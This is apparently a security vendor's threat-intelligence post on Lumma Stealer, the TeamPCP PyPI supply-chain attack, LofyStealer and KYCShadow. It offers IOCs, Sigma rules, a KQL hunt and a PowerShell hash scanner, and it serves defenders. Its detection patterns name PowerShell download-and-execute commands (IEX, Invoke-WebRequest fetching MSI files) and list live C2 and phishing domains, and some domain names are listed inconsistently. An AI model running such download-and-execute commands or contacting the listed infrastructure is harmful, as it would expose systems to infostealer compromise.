Back to Intelligence

Lumma Stealer Resurgence & Supply Chain Attacks: OTX Pulse Analysis — Enterprise Detection Pack

SA
Security Arsenal Team
May 2, 2026
5 min read

Recent OTX pulses reveal a coordinated surge in credential theft activity orchestrated by multiple threat actors including TeamPCP, LofyGang, and unknown groups deploying Lumma Stealer and KYCShadow. The attack vectors range from sophisticated supply chain compromises on PyPI (TeamPCP) to social engineering campaigns targeting gamers (LofyStealer) and ClickFix-style phishing delivering Lumma Stealer. The collective objective is mass harvesting of credentials, cookies, and banking data, utilizing multi-stage loaders and obfuscation to evade detection.

Threat Actor / Malware Profile

TeamPCP

  • Malware: msbuild.exe (trojanized), sysmon.py (credential harvester)
  • Distribution: Supply chain compromise via malicious telnyx Python SDK on PyPI.
  • Behavior: Three-stage architecture. Initial trojanized package triggers a platform-specific loader, which downloads a second-stage payload hidden inside a WAV file using steganography.
  • Persistence & C2: Deploys a credential harvester that exfiltrates encrypted data to C2 servers like scan.aquasecurtiy.org.

LofyGang (LofyStealer/GrabBot)

  • Malware: LofyStealer (aka Slinky, GrabBot)
  • Distribution: Social engineering targeting Minecraft players.
  • Behavior: Uses a 53.5MB Node.js-based loader disguised as legitimate libraries, dropping a 1.4MB native C++ payload that executes directly in memory.
  • Persistence & C2: Targets 8+ browsers for cookies, passwords, and credit cards. Uses syscall evasion techniques.

GhostSocks & Lumma Stealer

  • Malware: GhostSocks (Proxy), Lumma Stealer (Infostealer)
  • Distribution: Malware-as-a-Service (MaaS) via Russian underground forums.
  • Behavior: GhostSocks turns devices into residential proxy nodes using SOCKS5 and TLS encryption to blend traffic. Often bundles Lumma Stealer for data theft.
  • Persistence & C2: Written in GoLang; utilizes TLS-encrypted C2 channels.

KYCShadow

  • Malware: Android Banking Trojan
  • Distribution: WhatsApp messages posing as bank KYC verification.
  • Behavior: Multi-stage dropper with native code obfuscation and WebView-based phishing. Manipulates VPN traffic and intercepts SMS OTPs.
  • C2: Uses Firebase for remote command execution.

IOC Analysis

The provided pulses offer a mix of infrastructure and file-based IOCs:

  • Domains & URLs: Include C2 infrastructure (aquasecurtiy.org, serv.biz) and phishing/download URLs (robinhuds.com, api.biz). These should be blocked immediately on web proxies and firewalls.
  • IP Addresses: 85.11.161.198 (ClickFix payload server) and 24.152.36.241 (LofyStealer). Require immediate blocking and historical log review.
  • File Hashes: Numerous MD5, SHA1, and SHA256 hashes associated with loaders, payloads, and obfuscated installers. SOC teams should load these into EDR solutions for static scanning and hunting.

Detection Engineering

YAML
---
title: Suspicious MSBuild Execution via Python Process
id: 8e4f2a1b-3c9d-4e5f-8a7b-1c2d3e4f5a6b
description: Detects potential TeamPCP activity where Python SDKs weaponize msbuild.exe for persistence or evasion.
status: stable
author: Security Arsenal
date: 2026/05/03
references:
    - https://hexastrike.com/resources/blog/threat-intelligence/ringing-in-chaos-how-teampcp-weaponized-the-telnyx-python-sdk
tags:
    - attack.execution
    - attack.t1203
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\python.exe'
            - '\pythonw.exe'
        Image|endswith:
            - '\msbuild.exe'
    condition: selection
falsepositives:
    - Legitimate development builds using Python scripts invoking MSBuild
level: high
---
title: PowerShell Downloading MSI via ClickFix Pattern
id: 9f5a3b2c-4d0e-5f6a-9b8c-2d3e4f5a6b7c
description: Detects obfuscated PowerShell commands downloading MSI payloads, indicative of ClickFix campaigns distributing Lumma Stealer.
status: stable
author: Security Arsenal
date: 2026/05/03
references:
    - AlienVault OTX Pulse: User interaction with a ClickFix-style phishing site
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\powershell.exe'
    selection_cli:
        CommandLine|contains:
            - '.msi'
            - 'http://'
            - 'IEX'
            - 'Invoke-WebRequest'
    condition: all of selection_*
falsepositives:
    - Legitimate software installation scripts
level: high
---
title: Suspicious Node.js Loader Spawning System Processes
id: a0b6c4d5-5e1f-6a7b-0c9d-3e4f5a6b7c8d
description: Detects LofyStealer Node.js loader behavior where a large Node.js process spawns shell or native tools for execution.
status: stable
author: Security Arsenal
date: 2026/05/03
references:
    - https://zenox.ai/en/lofystealer-malware-mirando-jogadores-de-minecraft
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\node.exe'
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\rundll32.exe'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate Node.js development servers invoking build tools
level: medium


kql
// Hunt for ClickFix PowerShell Activity and Suspicious MSI Downloads
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any(".msi", "Invoke-WebRequest", "IEX") and FileName =~ "powershell.exe"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc


powershell
# IOC Hunt for Malicious Hashes (LofyStealer, GhostSocks, ClickFix)
$suspiciousHashes = @(
    "d21a5d08b4614005c8fcd9d0068f0190", # LofyStealer MD5
    "fb203c0ac030a97281960d7c28d86ebf", # LofyStealer MD5
    "ddd2994acd25bde5ac32a03f1cf30b41", # GhostSocks MD5
    "b07a03883675654088a2b56a80933ca8", # ClickFix MD5
    "b6a201726b44106a7dbe93a480b38420"  # ClickFix MD5
)
$processes = Get-Process
foreach ($proc in $processes) {
    $procPath = $proc.Path
    if ($procPath -and (Test-Path $procPath)) {
        $fileHash = (Get-FileHash -Path $procPath -Algorithm MD5).Hash.ToLower()
        if ($suspiciousHashes -contains $fileHash) {
            Write-Host "ALERT: Suspicious process detected - PID: $($proc.Id), Path: $procPath, Hash: $fileHash" -ForegroundColor Red
        }
    }
}


# Response Priorities

*   **Immediate:** Block identified domains (`serv.xyz`, `retreaw.click`, `robinhuds.com`) and IP addresses (`85.11.161.198`, `24.152.36.241`) at the perimeter. Scan endpoints for listed file hashes (TeamPCP, LofyStealer).
*   **24h:** Initiate credential reset for accounts accessed from infected endpoints or those exposed to the `telnyx` package compromise. Investigate Python environment logs for unauthorized package installs.
*   **1 week:** Enforce strict dependency verification (e.g., signed packages, checksums) for Python/Node.js environments. Enhance email filtering for ClickFix-style phishing templates targeting technical support scams.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialslumma-stealerlofystealersupply-chaininfostealerandroid-trojan

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action